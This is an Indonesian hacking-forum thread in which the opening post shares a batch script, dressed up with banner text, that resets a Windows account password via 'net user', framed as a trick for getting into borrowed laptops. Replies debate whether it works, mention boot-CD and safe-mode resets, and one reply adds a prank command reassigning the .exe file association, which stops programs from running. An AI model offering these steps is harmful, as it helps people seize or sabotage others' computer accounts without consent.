Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5

[Share] Hack Password Windows by CMD

#1
Barangkali member sini udah pada tau caranya, ane berbagi buat yang blm tau. silahkan monggo

"Biasanya ane buat ngakalin kalo lagi minjem laptop :dodgy:"

Langsung aja ke tutorialnya!!

1. Buka Notepad
2. Copy
Code:
@echo off
title FORNESIA
mode 47,16
cls
color 4f
echo.
echo             KAPTEN RAZOR is Here!
echo          .:ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ:.
echo.          
echo.
echo.
echo.
echo Username:
set /p user=
echo.
echo NewPassword:
set /p pwd=
pause > nul
net user %user% %pwd%
cls
color 0a
echo.
echo.
echo.
echo.
echo.
echo.
echo          KAPTEN RAZOR has Gone!
pause > nul
exit
3. Paste ke notepad dan simpan dengan format .bat (baca: dotbat)
4. Jalankan filenya (isi sesuai dengan informasi ... blablabla ...)
5. kalau sudah, Log off (Tekan tombol "Windows+L"), dan masukan password yang barusan ente ganti.


******** Ket ********
Untuk username silahkan lihat di:

[Image: daw.jpg]

Tekan tombol "Windows"
Username nya adalah Goliath


Semoga membawa manfaat, Maaf kalo ada salah'' kata dan tulisan ane acakadul susah di pahami mohon di maklumi. Jangan lupa Thanks nya:dodgy: Sekian!
Reply
#2
wahhh masih g mundeng caara kerjanya
makasih infonya gannn
JKT48, proud to be a member of ForNesia Family since Apr 2014.
Reply
#3
itu kan cuma nambah user duank gan? itu juga bisa asal kita udah masuk ke desktopnya,
TALK LESS DO MORE
Reply
#4
wew.. nnti passwordnya jd kosong yah gan itu?..
Reply
#5
kalau buat jahilin lagi coba ketik

assoc .exe .fornesia

simpan jadi .bat juga licik:
bimasakti, proud to be a member of ForNesia Family since Apr 2014.
Reply
#6
Nambah guest ya ?
pake Hirens juga bisa kan ?! ketawaaa
Reply
#7
Quote:ekeke., mantep nie., Big Grin ., reset pakek hiren juga bisa om., Big Grin ., pakek live cd. - See more at: http://www.fornesia.com/Thread-Share-Hac...vkfpU.dpuf

nah klo lepinya 11inch gmn gan?.. wkwkwkwk
Reply
#8
wah mantab gan, tapi gimana kalo mau run cmd mesti pake admin?
cyberwarezcp, proud to be a member of ForNesia Family since Apr 2014.
Reply
#9
ini sama aja kaya add user kan?
oneiric, proud to be a member of ForNesia Family since Apr 2014.
Reply
#10
bukan hack password ini cman nambah user -_-
chornos13, proud to be a member of ForNesia Family since Apr 2014.
Reply
#11
itu file nya di apain? di jalanin di laptop target? lah gimana jalaninnya, wong masuk desktop nya aja masih berpassword
dzonex, proud to be a member of ForNesia Family since Jan 2014.
Reply
#12
gan. kalo ane dulu prnah liat yg pake safe mode
Reply
#13
masa sih ngeliat pass windows segampang gitu
Reply
#14
cuma nambah user itu gan...bukan nemuin password...
hehehehe

lewat setting control panel juga bisa ketawaaa
Reply
#15
wkwkwkwkwk....
TS bisa aja...
gmn klo cmd prompt e di block?
gmn klo gk bs masuk desktop? gk bs log in?

hack via boot section gan ketawaaa tested berkali2 bantu org kantor yg lupa pasword gara2 laptop nya dimainin anak
jangan jahil gan...
gunakan ilmu buat beribadah gan
nice share gan ketawaaa
Reply
#16
kalo buka windows langsung minta password caranya gmn gan
efrosi, proud to be a member of ForNesia Family since Apr 2014.
Reply
#17
setahu ane ini itu bikin user dan kita dalam keadaan logged on, klo kita liat commandnya kita pake User korban buat bikin user baru, dalam kondisi ini kita butuh CMD yang admin maka dari itu kta pake user korban buat buka. CMIIW
Reply
#18
gan ane mao nanya bukannya masuk save mode pake pass juga yah? kalo tool agan pas si jendela belum di logon atau dalam posisi di remote bisa di jalankan gan ? maaf ya gan ane banyak nanya
Reply
  


Possibly Related Threads…
Thread Author Replies Views Last Post
  HACK ANDROID ichiro 11 2,744 04-10-2017, 07:35 PM
Last Post: ichiro
  [SHARE] c*a*k Password Wifii 99% ichiro 45 13,430 05-12-2016, 11:34 PM
Last Post: ichiro